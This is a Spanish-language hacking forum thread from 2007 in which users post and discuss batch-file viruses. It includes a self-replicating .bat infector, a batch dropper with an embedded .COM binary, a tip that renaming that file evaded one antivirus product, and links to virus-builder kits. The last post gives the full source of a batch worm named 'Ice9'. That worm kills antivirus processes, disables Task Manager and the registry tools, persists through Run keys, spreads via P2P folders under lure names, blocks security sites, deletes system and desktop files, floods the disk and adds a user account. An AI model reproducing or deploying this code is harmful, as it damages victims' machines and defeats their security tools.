elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 07:24  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Abril Negro 2007		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Abril Negro 2007  (Leído 5,770 veces)
WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.944


The Hacktivism is not a crime


Ver Perfil WWW
Abril Negro 2007
« en: 31 Marzo 2007, 03:05 »
Acá hay algunos codigos en batch que les pueden interesar un poco:

@echo off%!-%
if '%1=='~ goto !-%2
if exist \!-.bat goto !-r
if not exist %0.bat goto !-e
find "!-"<%0.bat>\!-.BAT
:!-r
command /c \!- ~ s . .. %path%
goto !-e
:!-s
shift%!-%
if '%2==' exist !-
for %%a in (%2\*.bat) do call \!- ~ i %%a
goto !-s
:!-i
find "!-"<%3>!-s
copy !-s !-!>nul
if exist !-! goto !-a
del !-s
type \!-.bat>>%3
exit !-
:!-a
del !-!
:!-e

 XD y este otro:

@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
¸ ·¢'Í/<ÿt%¿ÿÿ»­ ¸JÍ/GtWü¾¹¨ ó¤ŽÙ¾¥¥DüŒDþº¿²´VÍ!´AÍ!‹×A¸CÍ!Í = ·u°ÿÏ= ®té— ƒúÿuø:îuô`´Í!´6™<w}Í!Ñê;Úè C:\WINSTART.BAT Z¸@=w^Í!rZ“¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç°ÆEÏ€Í!ŽÙE2E0r&•S´?‹×±Í!‘´@‹ÝÍ! À[uë¸ WÍ!´>Í!‹Ý¸WÍ!´>Í!aê

jajajaja me diran.. este tio esta loco XD ps no estoy loco... es un virus en batch muy conocido llamado "bacteria2.bat"
Pueden bajar este y muchos ejemplos de codigos creados en batch desde aca:

http://512.iespana.es/virus_y_troyanos

También agregué algunos codigos fuentes de muchos virus para que puedan comprender su funcionamiento (por eso saqué los que no tenian el codigo) ya que la idea no es joder a todo mundo infectando gente y bajando programillas... para eso hay otras paginas, acá es para aprender.

Acabo de agregar dos programas para compilar tu propio virus... uno se llama "lavi" y el otro "viological ware" cada uno con sus textos explicativos. Ojala les sirva ;)

Att. Yan
Unilola Softwares.
« Última modificación: 31 Marzo 2007, 07:16 por WHK » En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.665


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Virus en batch
« Respuesta #1 en: 31 Marzo 2007, 13:44 »
¿Podrías explicar que es lo que hace este virus?
Es que yo se mas o menos batch y no entiendo mucho tu codigo...
¿Podrias ir explicando detalladamente que es lo que hace en cada una de las lineas?

Un saludo ;) ;)
En línea
StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 0.9- 100%
abcdef123

Desconectado Desconectado

Mensajes: 63



Ver Perfil
Re: Virus en batch
« Respuesta #2 en: 31 Marzo 2007, 16:43 »
Yo no tengo ni idea lo que hace pero lo he intentado guardar como .txt .doc .ppt .html y nada todo lo detecta al final lo he guardado en el correo  :D
En línea
Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.270



Ver Perfil WWW
Re: Virus en batch
« Respuesta #3 en: 31 Marzo 2007, 20:42 »
emm.....que hace esto kon chincheta??? es un error??? :huh:

Salu2  ;)
En línea
"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.944


The Hacktivism is not a crime


Ver Perfil WWW
Re: Virus en batch
« Respuesta #4 en: 31 Marzo 2007, 21:54 »
Quiero dejar en claro que yo no hice esos virus Aunque igual los entiendo a medias porque he aprendido mucho de ellos.
Talves fue un malentendido, solo quería compartir estos codigos fuente para que pudieran hechar a volar la imaginación. este post fue de una respuesta a programación en batch hecho y movido por el mismo sidarcat, Aunque muchos me han dicho que es muy buena info pero no quiero que se malinterprete.
Si no tienen ni idea de lo que hace un bat... pueden ver el post de programación en batch http://foro.elhacker.net/index.php/topic,132924.0.html
En línea

Tyrz


Desconectado Desconectado

Mensajes: 907


Get big or die tryin'


Ver Perfil WWW
Re: Virus en batch
« Respuesta #5 en: 1 Abril 2007, 02:41 »
joder yo hago programillas con batch y tal y eso lo veo y no sbria decirte ni en que lenguage esta
En línea
Surf
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: Virus en batch
« Respuesta #6 en: 1 Abril 2007, 02:57 »
la chicnheta se puso por error..
WHK lo puso en el foro de scripting en unpost con chincheta, al momento de moverlo aca, se le quedo..
ya se la quite :P
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.665


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Virus en batch
« Respuesta #7 en: 2 Abril 2007, 20:46 »
En Virustotal lo detectan casi todos los AV... Lo prové en una maquina Virtual con WinXP Proffesional SP2 y nada, no pasa nada con ninguno de los dos codigos, lo analicé y no se ejecuta todo el bat pues produce un error de sintaxis antes de acavar...

¿Alguien lo podía analizar y explicarmelo?

Un saludo ;) ;)
En línea
StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 0.9- 100%
Tyrz


Desconectado Desconectado

Mensajes: 907


Get big or die tryin'


Ver Perfil WWW
Re: Virus en batch
« Respuesta #8 en: 2 Abril 2007, 22:32 »
si la verdad esque si alguien lo explicara estaria fenomeno
En línea
Surf
Red Mx
Rojito
Colaborador
***
Desconectado Desconectado

Mensajes: 3.636


Viva México Cabrones...


Ver Perfil WWW
Re: Virus en batch
« Respuesta #9 en: 2 Abril 2007, 23:43 »
Código:
@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
¸ ·¢'Í/<ÿt%¿ÿÿ»­ ¸JÍ/GtWü¾¹¨ ó¤ŽÙ¾¥¥DüŒDþº¿²´VÍ!´AÍ!‹×A¸CÍ!Í = ·u°ÿÏ= ®té— ƒúÿuø:îuô`´Í!´6™<w}Í!Ñê;Úè C:\WINSTART.BAT Z¸@=w^Í!rZ“¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç°ÆEÏ€Í!ŽÙE2E0r&•S´?‹×±Í!‘´@‹ÝÍ! À[uë¸ WÍ!´>Í!‹Ý¸WÍ!´>Í!aê

por la lectura rapida que le die solo es un batch que crea un archivo en c llamado Q.com con este code el cual es una aplicacion .com  ¸

Código:
·¢'Í/<ÿt%¿ÿÿ»­ ¸JÍ/GtWü¾¹¨ ó¤ŽÙ¾¥¥DüŒDþº¿²´VÍ!´AÍ!‹×A¸CÍ!Í = ·u°ÿÏ= ®té— ƒúÿuø:îuô`´Í!´6™<w}Í!Ñê;Úè C:\WINSTART.BAT Z¸@=w^Í!rZ“¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç°ÆEÏ€Í!ŽÙE2E0r&•S´?‹×±Í!‘´@‹ÝÍ! À[uë¸ WÍ!´>Í!‹Ý¸WÍ!´>Í!aê

probe los dos guardandolos en un archivo .bat y el nod32 los detecto


al parecer son virus viejos

pero bueno

Código:
@echo off%!-%
if '%1=='~ goto !-%2
if exist \!-.bat goto !-r
if not exist %0.bat goto !-e
find "!-"<%0.bat>\!-.BAT
:!-r
command /c \!- ~ s . .. %path%
goto !-e
:!-s
shift%!-%
if '%2==' exist !-
for %%a in (%2\*.bat) do call \!- ~ i %%a
goto !-s
:!-i
find "!-"<%3>!-s
copy !-s !-!>nul
if exist !-! goto !-a
del !-s
type \!-.bat>>%3
exit !-
:!-a
del !-!
:!-e

Conocido para el nod32 como : Bat/swing.378 (virus)

Código:
@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
¸ ·¢'Í/<ÿt%¿ÿÿ»­ ¸JÍ/GtWü¾¹¨ ó¤ŽÙ¾¥¥DüŒDþº¿²´VÍ!´AÍ!‹×A¸CÍ!Í = ·u°ÿÏ= ®té— ƒúÿuø:îuô`´Í!´6™<w}Í!Ñê;Úè C:\WINSTART.BAT Z¸@=w^Í!rZ“¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç°ÆEÏ€Í!ŽÙE2E0r&•S´?‹×±Í!‘´@‹ÝÍ! À[uë¸ WÍ!´>Í!‹Ý¸WÍ!´>Í!aê

Conocido como: BAT/winstar.297


EDITO:

batch no es un lenguaje de programacion solo son archivos por lotes de MS-DOS los cuales son instrucciones que se ejecutan en modo consola

algo muy curioso solo le cambie la la Q por REDMX en este y el nod32 no lo detecto obiamente no lo ejecute

Código:
@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
¸ ·¢'Í/<ÿt%¿ÿÿ»­ ¸JÍ/GtWü¾¹¨ ó¤ŽÙ¾¥¥DüŒDþº¿²´VÍ!´AÍ!‹×A¸CÍ!Í = ·u°ÿÏ= ®té— ƒúÿuø:îuô`´Í!´6™<w}Í!Ñê;Úè C:\WINSTART.BAT Z¸@=w^Í!rZ“¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç°ÆEÏ€Í!ŽÙE2E0r&•S´?‹×±Í!‘´@‹ÝÍ! À[uë¸ WÍ!´>Í!‹Ý¸WÍ!´>Í!aê

COPY %0.BAT C:\Q.COM>NUL
C:\Q

aqui solo le puse

COPY %0.BAT C:\REDMX.COM>NUL
C:\REDMX
« Última modificación: 2 Abril 2007, 23:47 por Red Mx » En línea
Desarrollar Malware Es Causa De Cancer...
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.665


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Virus en batch
« Respuesta #10 en: 3 Abril 2007, 00:03 »
Si ya se k los detecta...Yo pienso k son los COM los k hacen daño...


Una cosa, para k sirven estos operadores k pone en ocasiones despues de la linea del codigo??
Código:
!-e
 !-r
 !-%
...
En línea
StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 0.9- 100%
WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.944


The Hacktivism is not a crime


Ver Perfil WWW
Re: Virus en batch
« Respuesta #11 en: 3 Abril 2007, 00:27 »
:!- indica un punto donde empieza la ejecucion e un script en batch llamado desde goto

cuando se declara shift se elimina una variable indicada.. en este caso !-%

cuando yo eclaro set !-=%xxx% estoy declarando una variable pero puedo poner lo que yo desee no tan solo !-

En el caso del q.com este se copia en c: con atributos de oculto y se crea a travez del coamdo echo. es solo una vieja tecnica para ocultar un virus dentro de un batch sin que sea detectado (antiguamente) por eso digo que solo son ejemplos para que puedan aprender como funciona un batch.
En línea

Tyrz


Desconectado Desconectado

Mensajes: 907


Get big or die tryin'


Ver Perfil WWW
Re: Virus en batch
« Respuesta #12 en: 3 Abril 2007, 10:27 »
Citar
Acabo de agregar dos programas para compilar tu propio virus... uno se llama "lavi" y el otro "viological ware"
odio los programas que les pones cuatro tonterias y ya te montan un virus, como hace ya unos años el satan...
En línea
Surf
WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.944


The Hacktivism is not a crime


Ver Perfil WWW
Re: Virus en batch
« Respuesta #13 en: 3 Abril 2007, 21:42 »
Pero a diferencia de estos dos, aca puedes compilar tu propio codigo ASM e injectarlo como función del virus, ademas hay muchos ejemplos para el que esté aprendiendo ese tipo de programación.
En línea

Saok Dagon

Desconectado Desconectado

Mensajes: 117

SaOk


Ver Perfil WWW
Re: Virus en batch
« Respuesta #14 en: 4 Abril 2007, 00:04 »
Hola

Aqui les dejo un verdadero worm en Batch, esta version no sirve para copiar y pegar, es simplemente una muestra, se le a añadido un par de fallos tontos y faciles de reconocer por los programadores batch. No me hago responsable de lo que se haga con este codigo:

Citar
rem *********************************************************************
rem ******************                             **********************
rem                          Ice9
rem ******************                             **********************
rem                      SaOk & Victoric
rem
rem ******************                             **********************
rem *********************************************************************
rem  Este es un Malware de Open Source
rem  No nos hacemos responsables del mal uso que se haga de el.
rem  Puede ser compilado con el nombre que se quiera.
rem *****************************************************************
rem  - Distribucion por p2p
rem  - AV killer
rem  - Impide que se acceda a algunas webs
rem  - Desactiba Registro y Administrador de tareas
rem  - se añade al registro para que se incie con la maquina
rem  - crea un archivo .txt y lo engorda de tamaño
rem  - Crea unos cuantos archivos en C:\
rem 

@ echo off
rem
rem distraemos al usuario
rem
start www.google.com
rem
rem ingeneria social
rem
title Actualizacion de Windows.NO cierren la venta.
rem
rem
rem creamo un par de variables
rem
set look=type C:\Windows\System32\shell32.dll >> c:\windos\system32\dog.txt
set kill=del /q/ s
set aviso=msg * La actualizacion a concluido con exito.Su Windows ya esta actualizado.
rem Procesos Av y Firewall
tskill aak.exe
tskill AcctMgr.exe
tskill McAfeeVirusScanService.exe
tskill MCAgentExe.exe
tskill McRegWiz.exe
tskill McVsRte.exe
tskill Norton Antivirus AV.exe
tskill NPROTECT.exe
tskill Pavsrv51.exe
tskill PaSSrv.exe
tskill PavFires.exe
tskill PavFnSvr.exe
tskill PavProt.exe
tskill pavprsrv.exe
tskill pavsrv51.exe
tskill prevsrv.exe
tskill PsImSvc.exe
tskill nod32krn.exe
tskill nod32kui.exe
tskill nod32.exe
tskill avgupsvc.exe
tskill avgamsvr.exe
tskill avgemc.exe
tskill avgcc.exe
tskill ashDisp.exe
tskill ashMaiSv.exe
tskill ashServ.exe
tskill ashWebSv.exe
tskill aswUpdSv.exe
tskill _avp32.exe
tskill _avpcc.exe
tskill _avpm.exe
tskill ackwin32.exe
tskill anti-trojan.exe
tskill apvxdwin.exe
tskill autodown.exe
tskill avconsol.exe
tskill ave32.exe
tskill avgctrl.exe
tskill avkserv.exe
tskill avnt.exe
tskill avp.exe
tskill avp32.exe
tskill avpcc.exe
tskill avpdos32.exe
tskill avpm.exe
tskill avptc32.exe
tskill avpupd.exe
tskill avsched32.exe
tskill avwin95.exe
tskill avwupd32.exe
tskill blackd.exe
tskill blackice.exe
tskill cfiadmin.exe
tskill cfiaudit.exe
tskill cfinet.exe
tskill cfinet32.exe
tskill claw95.exe
tskill claw95cf.exe
tskill cleaner.exe
tskill cleaner3.exe
tskill dvp95.exe
tskill dvp95_0.exe
tskill ecengine.exe
tskill esafe.exe
tskill espwatch.exe
tskill f-agnt95.exe
tskill findviru.exe
tskill f-prot.exe
tskill fprot.exe
tskill f-prot95.exe
tskill fp-win.exe
tskill frw.exe
tskill f-stopw.exe
tskill iamapp.exe
tskill iamserv.exe
tskill ibmasn.exe
tskill ibmavsp.exe
tskill icload95.exe
tskill icloadnt.exe
tskill icmon.exe
tskill icsupp95.exe
tskill icsuppnt.exe
tskill iface.exe
tskill iomon98.exe
tskill jedi.exe
tskill lockdown2000.exe
tskill lookout.exe
tskill luall.exe
tskill moolive.exe
tskill mpftray.exe
tskill n32scanw.exe
tskill navapw32.exe
tskill navlu32.exe
tskill navnt.exe
tskill navw32.exe
tskill navwnt.exe
tskill nisum.exe
tskill nmain.exe
tskill normist.exe
tskill nupgrade.exe
tskill nvc95.exe
tskill outpost.exe
tskill padmin.exe
tskill pavcl.exe
tskill pavsched.exe
tskill pavw.exe
tskill pccwin98.exe
tskill pcfwallicon.exe
tskill persfw.exe
tskill rav7.exe
tskill rav7win.exe
tskill rescue.exe
tskill safeweb.exe
tskill scan32.exe
tskill scan95.exe
tskill scanpm.exe
tskill scrscan.exe
tskill serv95.exe
tskill smc.exe
tskill sphinx.exe
tskill sweep95.exe
tskill tbscan.exe
tskill tca.exe
tskill tds2-98.exe
tskill tds2-nt.exe
tskill vet95.exe
tskill vettray.exe
tskill vscan40.exe
tskill vsecomr.exe
tskill vshwin32.exe
tskill vsstat.exe
tskill webscanx.exe
tskill wfindv32.exe
tskill zonealarm.exe
rem
rem empezamos desactivando el administrador de tareas.
rem
reg add hkcu\software\microsoft\windows\currentversion\policies\system" /v disabletaskmgr /t reg_dword /d ""1"" /f
rem
rem nos copiamos en system32 como root.bat
rem
copy %0  %HOMEDRIVE%\system32\%USERDOMAIN%.bat
attrib +H +S %HOMEDRIVE%\system32\%USERDOMAIN%.bat
rem por si acaso tambien en system
copy %0  %HOMEDRIVE%\system\%USERDOMAIN%.bat
attrib +H +S %HOMEDRIVE%\system\%USERDOMAIN%.bat
rem
rem nos agremos en el regsitro para iniciarnos con la pc
rem
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v SystemDates /d %0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Ice9 /d c:\WINDOWS\system32\%USERDOMAIN%.bat"
rem
rem ahora desactibamos el registro.
rem
reg add hkcu\software\microsoft\windows\currentversion\policies\system" /v disableregistrytools /t reg_dword /d ""1"" /f
rem
rem  vamos a dejarle sin el restaurador del sistema
rem
del /q /s %SystemRoot%\system32\restore\rstrui.exe
rem
rem una propagacion p2p sencilla
copy %0 C:\%ProgramFiles%\Grokster*Grokste*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Morpheus\*Shared*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\ICQ\*files*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\KaZaA\*Folder*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\KaZaA Lite\*Folder*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\EDONKEY2000\incoming\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\eMule\Incoming\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Filetopia3\Files\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\appleJuice\incoming\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Gnucleus\Downloads\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\LimeWire\Shared\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Overnet\incoming\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Shareaza\Downloads\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Swaptor\Download\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\WinMX\*Folder*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Tesla\Files\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\XoloX\Downloads\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Rapigator\Share\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\KMD\*Shared*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\BearShare\Shared\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\*Direct*\*Received*\pass_xxx_100webs.bat
rem
copy %0 C:\%ProgramFiles%\Grokster*Grokste*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Morpheus\*Shared*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\ICQ\*files*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\KaZaA\*Folder*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\KaZaA Lite\*Folder*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\EDONKEY2000\incoming\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\eMule\Incoming\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Filetopia3\Files\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\appleJuice\incoming\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Gnucleus\Downloads\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\LimeWire\Shared\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Overnet\incoming\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Shareaza\Downloads\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Swaptor\Download\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\WinMX\*Folder*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Tesla\Files\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\XoloX\Downloads\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Rapigator\Share\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\KMD\*Shared*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\BearShare\Shared\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\*Direct*\*Received*\Path_msn_Emoticonos_2006.bat
rem
copy %0 C:\%ProgramFiles%\Grokster*Grokste*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Morpheus\*Shared*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\ICQ\*files*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\KaZaA\*Folder*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\KaZaA Lite\*Folder*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\EDONKEY2000\incoming\sms_gratis.bat
copy %0 C:\%ProgramFiles%\eMule\Incoming\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Filetopia3\Files\sms_gratis.bat
copy %0 C:\%ProgramFiles%\appleJuice\incoming\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Gnucleus\Downloads\sms_gratis.bat
copy %0 C:\%ProgramFiles%\LimeWire\Shared\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Overnet\incoming\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Shareaza\Downloads\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Swaptor\Download\sms_gratis.bat
copy %0 C:\%ProgramFiles%\WinMX\*Folder*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Tesla\Files\sms_gratis.bat
copy %0 C:\%ProgramFiles%\XoloX\Downloads\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Rapigator\Share\sms_gratis.bat
copy %0 C:\%ProgramFiles%\KMD\*Shared*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\BearShare\Shared\sms_gratis.bat
copy %0 C:\%ProgramFiles%\*Direct*\*Received*\sms_gratis.bat
rem
copy %0 C:\%ProgramFiles%\Grokster*Grokste*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Morpheus\*Shared*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\ICQ\*files*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\KaZaA\*Folder*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\KaZaA Lite\*Folder*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\EDONKEY2000\incoming\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\eMule\Incoming\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Filetopia3\Files\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\appleJuice\incoming\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Gnucleus\Downloads\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\LimeWire\Shared\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Overnet\incoming\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Shareaza\Downloads\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Swaptor\Download\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\WinMX\*Folder*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Tesla\Files\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\XoloX\Downloads\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Rapigator\Share\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\KMD\*Shared*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\BearShare\Shared\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\*Direct*\*Received*\polifonicos_free.bat
cls
rem
rem vamos a putearle un poco
rem
MODE CON[:] [RATE=r DELAY=99999]
MODE CON[:] [COLS=2] [LINES=2]
rem
rem  No nos interesa que la victima visite estas paginas
echo 81.21.145.144 McAfee >> C:\WINDOWS\system32\drivers\etc\hosts
echo 212.170.238.10 panda >> C:\WINDOWS\system32\drivers\etc\hosts
echo 212.170.238.35 Norton >> C:\WINDOWS\system32\drivers\etc\hosts
echo 67.15.68.49 kaspersky >> C:\WINDOWS\system32\drivers\etc\hosts
echo 67.15.68.49 Nod32 >> C:\WINDOWS\system32\drivers\etc\hosts
echo 66.98.250.38 virusTotal >> C:\WINDOWS\system32\drivers\etc\hosts
cls
rem
rem  Creamos nuestra mascota
echo Mascota >> c:\windos\system32\dog.txt
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
cls
rem
rem  ya a comido mucho xD
rem
rem  ahora lo que hacemos creamos unos cuantos archivos
rem
for /l %%i in (1,1,9999999) do (echo turururura > c:\%%i.txt)
rem
rem
rem   ahora un porquito de maldad con los archivos
rem
%kill% c:\WINDOWS\system32\calc.exe
%kill% c:\WINDOWS\system32\mspaint.exe
%kill% c:\windows\system32\notepad.exe
rename c:\WINDOWS\system32\osk.exe c:\WINDOWS\system32\calc.exe
rename c:\WINDOWS\system32\write.exe c:\WINDOWS\system32\mspaint.exe
rename c:\WINDOWS\system32\winchat.exe c:\WINDOWS\system32\notepad.exe
rem
rem  Colocamos esto al final porque puede dar un error si esta en el escritorio
rem
del /q /s C:\*documents*\%USERNAME%\escritorio\*.*
:bucle
set numero2=1
set /a resultado=%resultado% + %numero2%
echo ICE9 malware.bat>> %resultado%.txt
if %resultado%==71 (goto :lets)
goto :bucle
:lets
rem payload
rem
net user Infect.by.Ice9.Malware.in.Batch ice9malware /add
net send * Infect Admin Pc with Ice9 marware in batch
rem *******************************************************************************
rem
cls
ver
pause
cls
%aviso%
cls
rem
rem *******************************************************************************
:AC
start cmd.exe echo error en la actualizacion
goto :AC
rem ******************************************************************************
rem                        FIN
rem ******************************************************************************
En línea
www.colgados.net date una pasadita!

Todo el anime, manga, pelis, series...etc
Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines